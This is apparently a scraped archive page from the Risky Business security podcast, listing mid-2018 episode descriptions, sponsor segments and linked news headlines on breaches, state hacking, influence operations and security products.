Russian trolls targeted Australian voters on Twitter via #auspol and #MH17
Google removes dozens of YouTube channels linked to 'influence operation'
The Untold Story of NotPetya, the Most Devastating Cyberattack in History | WIRED
Scammers Threaten to Review Bomb a Travel Company Unless it Pays Ransom - Motherboard
Instagram Expands 2FA Support Following Recent Wave of Account Hacks
Exploit Published for Unpatched Flaw in Windows Task Scheduler
SandboxEscaper on Twitter: "Here is the alpc bug as 0day: I don't fucking care about life anymore. Neither do I ever again want to submit to MSFT anyway. Fuck all of this shit."
Travel blog of an evil transgirl
Travel blog of an evil transgirl: Disclosures
Hackers Stole Personal Data of 2 Million T-Mobile Customers - Motherboard
You May Soon Be Able to Log Into Windows 10 Using a Google Account
How a hacker network turned stolen press releases into $100 million - The Verge
Cobalt Dickens threat group looks to be similar to indicted hackers
Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware - Securelist
Eset-Turla-Outlook-Backdoor.pdf
Researchers find way to spy on remote screens—through the webcam mic | Ars Technica
Windows 95 Is Now Available as an App for Windows, macOS and Linux
The adventures of lab ED011—“Nobody would be able to duplicate what happened there” | Ars Technica
Training
Building a Modern Security Program [Book]
The Next-Gen Web Protection Platform - WAF And RASP | Signal Sciences

Snake Oilers 7 part 1: Rapid7 on changes to InsightVM, ITProTV on online training

Aug 27, 2018


We’ve got two vendors pitching their wares in this edition of Snake Oilers. First up we’re talking to Rapid7 about its vulnerability scanning and management software. They’ve made some changes and they’ve got a couple more coming. This is bread and butter infosec stuff.

Then we’re going to hear from the team at ITProTV. They’re a video-based online training site, pitching themselves as a sort of Netflix for online training. Instead of conventional instructor-led training, they try to make the material less dry – half-hour training videos with two instructors on all sorts of topics.

The online training video sector is just booming right now, and ITProTV’s co-founder and “edutainer” Don Pezet will be along to walk through all of that.

Both of these companies are tracking enquiries originating from the podcast, so please do use the URLs in the show notes below if you’re interested in learning more.

Show notes
InsightVM Free Trial: Top Ranked Vulnerability Scanner | Rapid7
Learn technology and pass IT certifications with ITProTV

Risky Business feature interview: Bob Lord, CSO, Democratic National Committee

Aug 24, 2018


In this podcast you’ll hear an interview I did with Bob Lord, the Chief Security Officer for the Democratic National Committee, the DNC. Bob previously served as CISO for both Yahoo and Twitter, before spending some time in vendorland with Rapid7 as their CISO in residence.

The state-sponsored attack against the DNC is without doubt the most politically consequential data theft event the planet has ever witnessed. It trumped both the Manning/Wikileaks disclosures and “climategate” in terms of impact, and indeed to a large degree the fallout of the DNC hack is still ongoing.

So, I wanted to bring Bob in to talk about his job.

The DNC isn’t a large organisation, in a head office sense. They have about 200 core staff members, but as you’ll hear, a political organisation’s IT setup is pretty atypical. So Bob and I mostly just spoke about how one handles security for an organisation like the DNC.

Risky Business #510 -- Hacky hack hack

Aug 22, 2018


On this week’s show we’ll be running through the week’s security news, then diving right on into a sponsor interview with Lauren Pearl of Trail of Bits. She’s joining us to talk about something Trail of Bits has been up to lately: adding features to open source software – and auditing open source software – on behalf of its customers.

I do have a feature interview this week, but it’s a long one so I’ll be breaking that out into a separate podcast. It’s a nice long chat with Bob Lord, the CSO for the Democratic National Committee. You know, the guy who hid “the server”.

The news we’re covering this week:

Melbourne teenager hacky-hack hacks Apple
Facebook nukes Iranian and RU influence ops
Report: Sealed court order seeks Facebook Messenger E2E intercept
USG ditches PPD-20 equities process
A look at “Intrusion Truth” CN operator doxing ring
Microsoft kills RU phishing domains
PLUS MOAR

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Melbourne teen hacked into Apple's secure computer network, court told
Apple reassures customers after Australian media reports hack by teen
Taking Down More Coordinated Inauthentic Behavior | Facebook Newsroom
Suspected Iranian Influence Operation Leverages Network of Inauthentic News Sites & Social Media Targeting Audiences in U.S., UK, Latin America, Middle East | FireEye Inc
Exclusive: U.S. government seeks Facebook help to wiretap Messenger - sources | Reuters
PPD-20 elimination opens arguments over how U.S. should conduct offensive hacking operations
Bobby Chesney on Twitter: "Glad the dual-hat seems likely to hang on for at least a while. With no brakes at NSC, & now change to PPD-20 reducing interagency vetting of offensive mil cyber ops, the deconfliction of T10 & T50 equities that happens organically w/the NSA/CYBERCOM dual-hat looms even larger.…"
China's National Cybersecurity Standards Considered a Risk for Foreign Firms
Meet 'Intrusion Truth,' the Mysterious Group Doxing Chinese Intel Hackers - Motherboard
Microsoft Just Took Down Six Phishing Domains The Russian Government Was Using To Target US Politics
Google Sued Over Misleading Location Tracking Setting
Gmail's Confidential Mode Lets You Send Self-Destructing Emails
Skype's End-to-End Encryption Goes Live
Hackers Made Half a Million Dollars Pretending They Watched You Watch Porn - Motherboard
Apple Cleans Chinese App Store of Thousands of Fake Apps
GoDaddy Revocation Disclosure - Google Groups
JavaScript Web Apps and Servers Vulnerable to ReDoS Attacks
GitHub - sola-da/ReDoS-vulnerabilities: A list of ReDoS vulnerabilities in npm modules found by the Software Lab at TU Darmstadt. For each vulnerability, there is a proof-of-concept exploit, showing how the slowdown may occur. The resources in this repository are provided for research purpose only. Please read below for more details.
Cloud Product Accidentally Exposes Users' TLS Certificate Private Keys
Zero-Day In Microsoft's VBScript Engine Used By Darkhotel APT
PHP Deserialization Issue Left Unfixed in WordPress CMS
Get an open-source security multiplier | Trail of Bits Blog

Risky Business feature: Adam Boileau recaps Black Hat and DEF CON

Aug 20, 2018


In this breakout podcast we chat with Adam Boileau about the talks that caught his attention in Las Vegas a couple of weeks ago. The Black Hat PR team were kind enough to credential Adam for the con so he could go and see a few talks with his Risky Business hat on.

I was at Black Hat but spent most of my time running around like a headless chicken. These days Vegas week for me is mostly about locking in the next year’s sponsorships, as well as catching up with friends I hardly ever see. The good news is the sponsorship side is done. We’re almost sold out across the weekly show, Snake Oilers and Soap Box until 2020. The bad news is I didn’t really get to go to any talks.

But that’s ok, because Adam went to both Black Hat and DEF CON and he joined me to talk about the highlights from his point of view. This was his first trip to the Vegas cons since 2005, and he agreed with me that the content this year was actually pretty bloody good.

I’ve done my best to assemble links to everything Adam talks about into a list below:

Show notes
Practical Web Cache Poisoning | Blog
From Workstation to Domain Admin -- Why Secure Administration Isn't Secure
us-18-Shaik-LTE-Network-Automation-Under-Threat-wp.pdf
Black Hat: Understanding TRITON, The First SIS Cyber Attack
TRITON Analysis Tools
airgap | Advanced Cyber-Security Research Lab
Screaming Channels: When Electromagnetic Side Channels Meet Radio Transceivers
Black Hat USA 2018 | Briefings
DCShadow attack
DEF CON® 26 Hacking Conference Speakers
GitHub - sensepost/mana: Our mana toolkit for wifi rogue AP attacks and MitM - see hostapd-mana too
GitHub - quickbreach/SMBetray: SMB MiTM tool with a focus on attacking clients through file content swapping, lnk swapping, as well as compromising any data passed over the wire in cleartext.

Risky Business #509 -- Just the usual mayhem and ownage

Aug 16, 2018


Adam and I have just returned from Black Hat and DEF CON in Las Vegas, so in this week’s show we’re going to have a look at the infosec news we missed over the last couple of weeks. We did plan to recap Black Hat in this podcast, but we’ve wound up a bit short on space so I’m busting that out into a separate podcast that I’ll publish on Monday. So this podcast will just be a discussion around news plus a sponsor interview.

The news we’re covering:

Australia’s new surveillance/”anti-encryption” laws
Intel SGX vulnerability research
Taiwan Semiconductor WannaCry woes
Details on CYBERCOM op against ISIS
Reddit pwnage
Bitcoin investor sues AT&T over $23m loss
FIN7 arrests
CIA’s loss of scores of China assets may have been hack-related
Massive ATM cashout and SWIFT attack hits Indian bank
Much, much more

Bugcrowd CTO Casey Ellis joins us in this week’s sponsor interview to talk about a few things – firstly, how some research presented at Black Hat by the team at Portswigger is a sign that serious research teams are using bounties to cash in on their serious security research. Then we’ll be talking about the Bugcrowd University initiative and a reboot of the project.

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Apple and Facebook pressured to reveal terror suspects' data
'Foreshadow' Flaw Undermines the Intel CPU Secure Enclave | WIRED
Key iPhone supplier is hamstrung with the debilitating WannaCry worm | Ars Technica
How US Military Hackers Prepared to Hack the Islamic State - Motherboard
Password breach teaches Reddit that, yes, phone-based 2FA is that bad | Ars Technica
Bitcoin Investor Sues AT&T After Losing $23 Million In SIM Swap Hack - Motherboard
Fin7: The Inner Workings of a Billion-Dollar Hacking Group | WIRED
Former Microsoft engineer sentenced for role in ransomware scheme
Botched CIA Communications System Helped Blow Cover of Chinese Agents – Foreign Policy
In-vehicle wireless devices are endangering emergency first responders | Ars Technica
Hackers Steal $13.5 Million Across Three Days From Indian Bank
DNC tells candidates not to use Huawei or ZTE devices
Report: 'Faxploit' hack can penetrate networks with just a fax number
Popular Android Apps Vulnerable to Man-in-the-Disk Attacks
New Method Simplifies Cracking WPA/WPA2 Passwords on 802.11 Networks
U.S. Payment Processing Services Targeted by BGP Hijacking Attacks
Hacked Water Heaters Could Trigger Mass Blackouts Someday | WIRED
Malware has no trouble hiding and bypassing macOS user warnings | Ars Technica
Powerful Smartphone Malware Used to Target Amnesty International Researcher - Motherboard
In-the-wild router exploit sends unwitting users to fake banking site | Ars Technica
This Guy Hacked Hundreds Of Planes From The Ground
Cisco to acquire Duo Security for $2.35 billion
Practical Web Cache Poisoning | Blog
So our hacker friends don’t go to jail.
Bugcrowd University – Bugcrowd

Risky Business #508 -- Special guest Greg Shipley of In-Q-Tel's Cyber Reboot

Jul 31, 2018


On this week’s show we hear from Greg Shipley. Greg works at an initiative spun up by In-Q-Tel called Cyber Reboot. Its goal is to develop open source tools that can push things forward in security – things the private sector isn’t doing.

He’ll be telling us about some changes his colleagues have made to tcpdump, which, if they ever manage to get the changes adopted, could actually be quite useful to the security community.

This week’s show is brought to you by Duo Security! And Duo’s very own Dave Lewis will be joining us this week to talk about the roadblocks you might face if you’re trying to head down the BeyondCorp road to the deperimeterised nirvana!

Adam Boileau drops in to discuss the week’s news, including:

COSCO shipping ransomwared into oblivion
DHS warning on impending ERP attacks
Charges against SIM-swap cryptocurrency thief
Google’s “Shielded VMs”
Google’s launch of its own hardware security tokens
Master134 malvertising campaign
New Kronos version
NetSpectre attacks
Bluetooth bugs
Much, much more

Links to everything are below, and you can follow Patrick or Adam on Twitter if that’s your thing.

Show notes
Shipping company’s networks in the Americas crippled by ransomware attack | Ars Technica
US government's "do not buy" list shuts out Russia, China | ZDNet
Fighting Chinese cyber-espionage could cost U.S. 5G dominance
WikiLeaked: Over 11,000 messages from private WikiLeaks chat released – Emma Best
Russian Hackers’ New Target: a Vulnerable Democratic Senator
Facebook Suspends Alex Jones’ Profile - Motherboard
DHS Warns of Impending Cyber-Attacks on ERP Systems
Hackers find creative way to steal $7.7 million without being detected | Ars Technica
‘TELL YOUR DAD TO GIVE US BITCOIN:’ How a Hacker Allegedly Stole Millions by Hijacking Phone Numbers - Motherboard
Google launches “Shielded VMs” to protect cloud servers from rootkits, data theft | Ars Technica
Security keys have been good to Google, so now it's promoting one of its own
Massive Malvertising Campaign Discovered Attempting 40,000 Infections per Week
Symantec Discovers New and Inexperienced Iranian APT
New Version of the Kronos Banking Trojan Discovered
New Spectre attack can remotely steal secrets, researchers say | ZDNet
Decade-old Bluetooth flaw lets hackers steal data passing between devices | Ars Technica
Idaho Inmates Hacked Prison Service for $225,000 in Credit - The New York Times
Senrio
Reimagining Cyber Defense – CyberReboot – Reimagining Cyber Defense
Home: BroCon 2018
The Trusted Access Company | Duo Security

Risky Biz Soap Box: Zane Lackey of Signal Sciences talks DevOps

Jul 30, 2018


What you’re about to hear is a long form interview with Zane Lackey, a former pentester turned director of security engineering for Etsy turned co-founder and CSO of Signal Sciences.

Signal Sciences can be broadly, kinda described as “next generation WAF”. If you do have a requirement for a waffy, raspy thing, then you absolutely need to check out Signal Sciences.

They give you visibility into attacks against your applications, and can even auto-block a bunch of them without that turning into a cascading horror-show.

Signal Sciences’ product has a really strong emphasis on assisting organisations who are running DevOps shops. And it makes sense, Zane’s key achievement at Etsy was managing the security of that company’s DevOps transition.

He’s actually just written an O’Reilly book, Building a Modern Security Program. So, he joined me to talk about his book, what’s in it, about DevSecOps more generally, and about some new stuff Signal Sciences has been working on.

Risky Business #507 -- For Vlad

Jul 25, 2018


We didn’t have space to run a feature in this week’s show, mostly because we had three weeks of news to catch up on because of my holiday. Adam Boileau is away on a company retreat this week, so Haroon Meer is this week’s news guest.

We talk about:

The Russia indictment
Chrome now marks http sites as “not secure”
Julian Assange is close to being turfed out of his London digs
Microsoft’s midterm meddling misfire
Singapore loses 1.5m health records
Some cool research from Talos and Cyberark
Azimuth Security acquired by L3
The npm supply-chain attack
Chrome site isolation
And much more!

This week’s sponsor is ICEBRG. And ICEBRG just announced today that it’s been acquired by Gigamon, which is pretty big news for them. So we’ll spend a couple of minutes talking about that with ICEBRG’s Jason Rebholz. Then we’ll be talking to Justin Warner about a pretty cool Flash 0day they found hiding in a Microsoft Office document. That was some pretty cool work, and the attackers in that case did some pretty novel things in terms of keeping their payload away from prying eyes. Obviously they didn’t do a good enough job or we wouldn’t be talking about it, but there are some new techniques there, fun stuff.

*****NOTE: At one point I get Jason Rebholz’s name wrong. I call him Justin Rebholz by accident. Apologies for the error, Jason!

Show notes
Today’s the day that Chrome brands plain old HTTP “not secure” | Ars Technica
12 Russian Spies Indicted for Hacking in 2016 | Fortune
The Russians Who Allegedly Hacked the DNC Sexted a Playboy Model and 'Bond Girl' - Motherboard
Russian hackers struck Clinton server hours after Trump called for emails - CyberScoop
Trump calls Putin's plan for investigating 2016 DNC breach an 'incredible offer' - Cyberscoop
Ecuador 'close to evicting' Julian Assange from UK embassy | The Independent
Microsoft: Russian Hackers Are Targeting The Midterms
Three top cybersecurity officials are leaving the FBI: Report
Singapore personal data hack hits 1.5m, health authority says - BBC News
Cisco's Talos Intelligence Group Blog: Advanced Mobile Malware Campaign in India uses Malicious MDM
Cellebrite's newest target: Your IoT-filled home
Alexa, Are You A Spy? Israeli Startup Raises $12.5 Million So Governments Can Hack IoT
L3 Strengthens Intelligence Collection and Surveillance Capabilities With Cyber Acquisitions | Business Wire
In the opaque world of government hacking, private firms grapple with allegiances
King iPhone Hacker NSO Group Robbed By Employee -- Spyware On Dark Web Sale For $50 Million, Israel Claims
Private sector played critical role in WannaCry attribution, ODNI official says
Compromised JavaScript Package Caught Stealing npm Credentials
Google Chrome shifts browser architecture to thwart Spectre attacks
Lawmakers call on Amazon and Google to reconsider ban on domain fronting
DOJ regrets the error on OPM-linked fraud case
A Privacy Researcher Uncovered a Year’s Worth of Breakups and Drug Deals Using Venmo’s Public Data - Motherboard
Avoid Detection with Shadow Keys - CyberArk
Attacks on Oracle WebLogic Servers Detected After Publication of PoC Code
Watch a Hacker Install a Firmware Backdoor on a Laptop in Less Than 5 Minutes - Motherboard
Many Bluetooth Implementations and OS Drivers Affected by Crypto Bug
ICEBRG, Inc.
Risky Biz Annual Black Hat Party w/ Signal Sciences, Remediant and Bugcrowd Tickets, Tue, Aug 7, 2018 at 7:00 PM | Eventbrite

Risky Biz Soap Box: Cylance: Driving machine learning model development with threat research

Jul 18, 2018


There’s no weekly show this week, I’m on a beach somewhere tropical right now and I prepared this one so we’d have something to run while I’m away. The Soap Box is one of our wholly sponsored podcasts here at Risky Biz HQ – vendors pay to come on to talk about what’s on their mind.

And this week we’ve got Cylance’s very own Chris Sestito joining us. He heads threat research for Cylance, the AV company.

Cylance is a relatively new company – they’ve been around about six years now – and regular listeners would have heard me credit them for almost singlehandedly shaking up the AV industry.

They built a machine learning model for detecting malware that was effective enough to actually challenge the incumbents, who until then had a stranglehold on the market. Cylance’s fortunes rose further when it played an instrumental part in detecting and cleaning up malware used against the US Office of Personnel Management, or OPM.

That was a big moment, because from there it seemed like all of a sudden EVERYONE was a machine learning company. I’m sure a lot of people listening to this podcast are so sick to death of hearing pitches from vendors about machine learning.

But the thing is, Cylance was built on machine learning and they are still 100%, 24-carat true believers. Chris Sestito joined me to talk about driving machine learning model development with threat research, dodgy machine learning marketing and more.

Snake Oilers 6 part 2: Proofpoint on cred phishing, Exabeam defines next-gen SIEM

Jul 5, 2018


Snake Oilers is a wholly sponsored podcast series we run a few times a year here at Risky Biz HQ. The idea is we get a bunch of vendors together and they pitch their tech in a straightforward way. Less “stops advanced cyber threats” and more “here’s what our stuff does and how it works”.

You’re hearing this instead of a weekly show because I am currently on a beach somewhere tropical.

We’ve got two vendors in this edition of ‘Oilers: next-gen SIEM platform company Exabeam and email filtering giant Proofpoint.

Our sponsor guest from Proofpoint is Ryan Kalember. Ryan is the SVP of cybersecurity strategy at Proofpoint, and regular listeners would have heard him pop up here and there on other Risky Business podcasts.

Ryan knows an awful lot about email security and he’s joining us this week to talk about a few things. A big selling point he wants to hit home this week is that Proofpoint offers its clients dedicated IPs for their outbound mail servers. That means you won’t be blocked when someone else using the same IP for outbound mail starts sending spam. Believe it or not this is a thing that happens to users on other mail filtering platforms. From there Ryan spells out Proofpoint’s approach to combating credential phishing. Aaaaand we talk about other stuff too. We started off by talking about how some organisations are getting blocked because their filtering provider is sharing IPs between clients.

Exabeam also drops in to talk about what a next gen SIEM actually is. From day one Exabeam was a startup that meant business. As you’ll hear, they started off as a SIEM-helper, and they’ve gradually built out their product from there. Now they’re going after the established SIEM market – think Splunk, ArcSight, those types of products. Despite only being five years old, Exabeam has quickly established itself as a real player in the SIEM market.

And why not? They make a compelling argument that the most popular SIEM products have gone stale. Anu Yamanan is the VP of products at Exabeam and she’s here to explain the general pitch behind all next generation SIEM gear. The idea is to go beyond the event log and build a timeline of events that actually has context around it. SOC analysts, SIEM specialists and CSOs will be interested to hear what she has to say here.

Show notes
Leader in Advanced Cybersecurity Solutions | Proofpoint
Exabeam - The Market Leader in Next Gen SIEM Solutions

Risky Business #506 -- How security teams can work with PR

Jul 4, 2018


On this week’s show we’re chatting with a PR pro who specialises in information security. Melanie Ensign currently works at Uber, but she also handled security PR for Facebook and, before that, AT&T. She drops in this week to talk about how you can work with the PR professionals in your organisation to help tell your security story to the wider world. She also has some great tips for infosec professionals who might be a bit nervous about dealing with journalists.

In this week’s sponsor interview we’re joined by Julian Fay, the CTO of Senetas.

Senetas has a long history of making layer 2 network encryptors, but they are branching out in all sorts of ways these days. One thing they’re doing now is working on approaches to network encryption that play nicely with software-defined WAN. The days of hauling all your network traffic back to a single choke point are numbered – Julian thinks in the near future you’ll have some sort of CPE device that actually implements different types of encryption on different types of traffic crossing your border. So, Senetas has actually built that gear and we’ll be hearing about why.

Adam Boileau joins the show to talk about the week’s security news:

Some very cool LTE research
Equifax manager charged with insider trading
Ticketmaster’s bad week
The US DoD’s very own app store
Weird, maybe, possibly-but-probably-not OPM-related fraud
MOAR Rowhammer stuff affecting ‘droid handsets

Links to everything are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
LTE wireless connections used by billions aren’t as secure as we thought | Ars Technica
Former Equifax Manager Charged With Insider Trading
Trump calls out NSA for deleting data: Here are the facts - CBS News
Startup bank Monzo: We warned Ticketmaster months ago of site fraud • The Register
Ticketmaster UK trades blame with chat app provider over payment data breach
Bill would call on White House to develop its own list of APT groups
Private sector isn’t sharing data with DHS’s threat portal
U.S. poised to deny China Mobile access to American market due to spying fears
How the Pentagon Keeps Its App Store Secure | WIRED
Lawmakers demand answers in wake of strange OPM identity fraud lawsuit
DNC pushes employees, campaigns to embrace email security habits ahead of midterms
Feds Pose as Cryptocurrency Money Launderer to Bust Alleged Dark Web Dealers - Motherboard
Cryptocurrency Transactions May Uncover Sales of Shadow Broker Hacking Tools - Motherboard
DNS Poisoning or BGP Hijacking Suspected Behind Trezor Wallet Phishing Incident
Brave browser adds private tabs with Tor for 'enhanced privacy protection'
Rash of Fortnite cheaters infected by malware that breaks HTTPS encryption | Ars Technica
New RAMpage exploit revives Rowhammer attack to root Android devices | Ars Technica
adidas - adidas alerts certain consumers of potential data security incident
Marketing Firm Exactis Leaked a Personal Info Database With 340 Million Records | WIRED
Sadly, Ross Ulbricht's Case Will Not Be Heard by the Supreme Court - Hit & Run
Two Zero-Day Exploits Found After Someone Uploaded 'Unarmed' PoC to VirusTotal
Gentoo GitHub organization hacked - partially resolved - Gentoo infrastructure status
Samsung Investigates Claims of Spontaneous Texting of Images to Contacts | The first stop for security news | Threatpost
Senetas - a leading provider of high-assurance encryption
Risky Biz Annual Black Hat Party w/ Signal Sciences, Remediant and Bugcrowd Tickets, Tue, Aug 7, 2018 at 7:00 PM | Eventbrite

Risky Business #505 -- Sanger vs FireEye, Reality Winner cops a plea

Jun 27, 2018


No feature interview in this week’s show, we go long on news instead. Adam Boileau joins the podcast to talk through the week’s infosec news, including:

Confusion reigns in David Sanger vs FireEye spat
Reality Winner pleads guilty
PEXA property settlement platform users fleeced
US Supreme Court decides location info requires a warrant
The Apple unlock bug that wasn’t

This week’s show is brought to you by Thinkst Canary. Thinkst’s very own Marco Slaviero joins us in this week’s sponsor segment to talk about how some vendors are derping out when it comes to creating needlessly complicated “deception platforms”.

Links to everything are below, and you can follow Adam or Patrick on Twitter if that’s your thing.

Show notes
FireEye denies 'hack back' claims detailed in new book
Kim Zetter on Twitter: "I wonder if Congress will hold a hearing to discuss the issue of a private US company taking on the role of the NSA to hack foreign military computers. This raises a lot of issues about potential national security blowback when a private company inserts itself in state matters."
Kim Zetter on Twitter: "Sanger's description of what he says Mandiant did vs. what Mandiant says it did. Sanger implies he saw videos of Chinese hackers wearing leather jackets and undershirts - that's not in video Mandiant published. Are there other videos? Did Sanger misinterpret? So many questions."
Former NSA contractor Reality Winner accepts guilty plea for leaking classified report
Supreme Court: Police Need Warrant for Mobile Location Data — Krebs on Security
Bail Bond Company Let Bounty Hunters Track Verizon, T-Mobile, Sprint, and AT&T Phones for $7.50 - Motherboard
PEXA account compromise sees family lose home sale funds - Security - iTnews
MasterChef: Dani Venn homeless after hackers steal $250K
Microsoft Forcing Multi-Factor Authentication on Azure AD Admin Accounts
Police officer guilty of assault, perverting the course of justice
Apple corrects the record on reported iPhone vulnerability
Cops May Unlock iPhones Without a Warrant to Beat Apple's New Security Feature - Motherboard
Firefox is adding 'Have I Been Pwned' alerts
VirusTotal launches Monitor tool to fight false positives - CyberScoop
New WPA3 Wi-Fi Standard Released
Lawmakers urge Google to end partnership with China's Huawei
‘Tick’ espionage group is likely trying to hop air gaps, researchers say
Bithumb, South Korea's largest cryptocurrency exchange, loses $30 million to hackers
Unpatched Flaw Disclosed in WordPress CMS Core
I discovered a browser bug
Project Zero: Detecting Kernel Memory Disclosure – Whitepaper
The $5 Million Surveillance Car That Hacks iPhones From 500 Meters
Canary — know when it matters

Snake Oilers 6 part 1: InsightIDR from Rapid7, whitelisting with Airlock Digital and testing your SOC personnel with AttackIQ

Jun 21, 2018


First up in this edition of Snake Oilers we speak with Rapid7. Listeners of the regular show would have heard me talk about their UserInsight software for years. That’s because I knew people who used it and they swore by it. UserInsight was user and entity behaviour analytics (UEBA) software that was massively ahead of its time. It was very good at spotting weird things happening on your network when it comes to dumped or compromised creds popping up in weird places.

Well, InsightIDR is basically where UserInsight wound up, and yeah, it’s morphed into a product that’s half SIEM and half EDR.

Every Tom, Dick and Harriett seems to be offering EDR software these days, and every next-gen SIEM company is becoming more and more UEBA-centric, so what Rapid7 has created here is something in between. InsightIDR product manager Eric Sun will tell us all about it.

Next up we’ll hear the simplest pitch in this podcast, from Airlock Digital. They’re an Australian company that makes whitelisting software that’s actually usable. If your organisation has tried implementing whitelisting through Microsoft’s AppLocker then you know how badly it sucks. These guys have created a simple but usable whitelisting solution.

I’ve been to the booth! I’ve seen the demo! Airlock Digital co-founder David Cottingham is our guest on their behalf. In addition to being a founder, David is also the author of the SANS course SEC480, which covers the ASD top 4 – number one on that list is whitelisting. He has experience in the federal government implementing whitelisting and, after seeing just how badly other products suck, he and his mates founded Airlock Digital. So yeah, if you’re whitelist-curious or if you’re sick of dealing with AppLocker, then you really, really should stick around for that one.

After that we’re checking in with Stephan Chenette of AttackIQ. They make attack simulation software, but in response to customer demand they’ve actually taken it to its logical extension - they’re now offering modules you can use to test your SOC staff, or, if you outsource, you can use these modules to test your MSSP. Throw some alerts at them and see what comes back – get scores for individual SOC operators. Hey, even if you ARE an MSSP you might want to use this software to see who to promote in your SOC. That’s interesting stuff.

Show notes
InsightIDR Free Trial: The SIEM You've Always Wanted | Rapid7
Airlock Digital - Application Whitelisting Software
Cyber Hunt

Risky Business #504 -- Latest email frauds and changes to money muling

Jun 20, 2018


On this week’s show we’re chatting with Alex Tilley. He’s with Secureworks in Australia these days, but before that he spent a big chunk of his career with the Australian Federal Police.

He did a presentation a few weeks back at the AusCERT conference all about what fraud crews are up to these days. He’ll be joining us to walk through how much damage West African crime groups are doing with compromised office 365 accounts. We also talk a bit about trends in money muling, because that game has really changed.

This week’s show is brought to you by Cylance, and in this week’s sponsor interview we’ll be chatting with Cylance’s very own Jim Walter about how ransomware hasn’t really gone anywhere, despite most of the tech press getting sick of writing about it.

Adam Boileau, as usual, joins us to talk about the week’s news, including:

The Vault7 guy is totally screwed
US Senate scuttles Trump’s plan to save ZTE
Chinese pwning satellite comms, telcos
Olympic Destroyer crew is back

Links to everything are below and you can follow Patrick and Adam on Twitter if that’s your thing.

Show notes
Ex-CIA employee charged in major leak of agency hacking tools - The Washington Post
Ryan Duff on Twitter: "The CIA leaker conducted a privilege escalation on the computer he used to access the data he stole, erased all the logs of his activity, and then locked other users out. A lot more tradecraft here than your average leaker…"
WikiLeaks Shares Alleged Diaries of Accused CIA Leaker Joshua Schulte - Motherboard
Senate rejects Trump’s plan to lift ZTE export ban | Ars Technica
China-based campaign breached satellite, defense companies: Symantec | Reuters
Senate bill hopes to sort out supply-chain cybersecurity risks, prevent next Kaspersky drama
Kaspersky Halts Europol and NoMoreRansom Project Coop After EU Parliament Vote
North Korea to blame for string of Latin America bank hacks, insiders say
After Trump courts Kim, U.S. issues warning on North Korean malware
The Olympic Destroyer Hackers May Have Returned For More | WIRED
Patrick Gray on Twitter: "And there it is. The circle is complete. The whole point of Olympic Destroyer was to cast doubt on attribution generally, even though nobody who matters ever made attribution claims based on a few “vectors”.…"
Yubico snatched my login token vulnerability to claim a $5k Google bug bounty, says bloke • The Register
Iran’s Telegram Ban Has Impacted All Corners of the Country | WIRED
FBI recovers WhatsApp, Signal data stored on Michael Cohen’s BlackBerry | Ars Technica
Reminder: macOS still leaks secrets stored on encrypted drives | Ars Technica
Verizon and AT&T will stop selling your phone’s location to data brokers | Ars Technica
Google to Fix Location Data Leak in Google Home, Chromecast — Krebs on Security
17 Backdoored Docker Images Removed From Docker Hub
Cortana Hack Lets You Change Passwords on Locked PCs
ZeroFont Technique Lets Phishing Emails Bypass Office 365 Security Filters
Hacker Breaches Syscoin GitHub Account and Poisons Official Client
Clipboard Hijacker Targeting Bitcoin & Ethereum Users Infects Over 300,0000 PCs
Chris Vickery on Twitter: "Holy shit. This guy, George Cottrell, was advertising money laundering services on the dark web. He was caught red-handed in a FBI sting. Guy is (was) top aide to the Brexit campaign leader, Nigel Farage. His super secret dark web username was "Banker"."
InstaCyber on Twitter: "It begins. THANKS #GDPR"
Bitcoin’s Price Was Artificially Inflated, Fueling Skyrocketing Value, Researchers Say - The New York Times
Man Gets 20 Years In Jail For Trying To Steal A Domain Name At Gunpoint | Gizmodo Australia
Cops Are Confident iPhone Hackers Have Found a Workaround to Apple’s New Security Feature - Motherboard
cylance spear team - Google Search

Risky Business #503 -- North Korean tech in the global supply chain

Jun 13, 2018


You might have noticed North Korea’s been in the news over the last couple of days. Well, we’re sticking with the theme – we’ve got a great feature interview for you this week with Andrea Berger. She’s a senior research associate at the US-based James Martin Centre for Nonproliferation Studies and the co-host of the Arms Control Wonk podcast. This week she speaks with Risky Business contributor Hilary Louise about a report the centre did into North Korea’s IT industry.

Yep, they have one, and you’ll be surprised by its scope and reach. That’s this week’s feature interview.

This week’s sponsor interview is with Signal Sciences co-founder and CEO Andrew Peterson. Andrew was at a Gartner event in DC last week, and I grabbed some time with him to talk about what’s new in DevSecOps, how people are applying various DevSecOps tools, and what the general awareness of good DevSecOps practices is out there. Andrew’s prior career was in development, not security. He and Zane Lackey worked together at Etsy and Signal Sciences was very much inspired by the work they both did there. Andrew says analysts are starting to understand that web application security isn’t something you drop on to a network in an appliance and things are actually changing.

Mark “Pipes” Piper is this week’s news guest. All the show links are below and you can follow Patrick, Pipes or Hilary, if that floats your boat.

Show notes
Founder of Cybersecurity Company Says His Firm Was Sanctioned Because He was Born in Russia - Motherboard
Treasury Sanctions Russian Federal Security Service Enablers | U.S. Department of the Treasury
Republican senators move to block Trump’s deal to revive ZTE | Ars Technica
WannaCry Hero Marcus Hutchins' New Legal Woes Spell Trouble for White Hat Hackers | WIRED
Cisco's Talos Intelligence Group Blog: VPNFilter Update - VPNFilter exploits endpoints, targets new devices
Top U.S. counterintelligence official: Kaspersky's move to Switzerland doesn't matter
Chinese hackers stole sensitive U.S. Navy submarine plans from contractor
China ramps up hacking of U.S. high-tech companies | McClatchy Washington Bureau
Flash zero-day shows up in Qatar amid geopolitical struggles
NDAA pushes U.S. Cyber Command to be more aggressive
Senator hopes to draw red line discouraging election cyberattacks
Congress wants to prevent states from weakening encryption
FBI announces arrest of 74 email fraudsters on three continents
For almost 11 years, hackers could easily bypass 3rd-party macOS signature checks | Ars Technica
I can be Apple, and so can you | Okta
This app in Google Play wants to use phone mics to enforce copyrights | Ars Technica
In a blow to e-voting critics, Brazil suspends use of all paper ballots | Ars Technica
Some Signal Disappearing Messages Are Not Disappearing - Motherboard
US Government Probes Airplane Vulnerabilities, Says Airline Hack Is ‘Only a Matter of Time’ - Motherboard
Hackers Crashed a Bank’s Computers While Attempting a SWIFT Hack
Apple just banned cryptocurrency mining on iOS devices | Ars Technica
Ethereum "Giveaway" Scammers Have Tricked People Out of $4.3 Million
Around 5% of All Monero Currently in Circulation Has Been Mined Using Malware
Trik Spam Botnet Leaks 43 Million Email Addresses
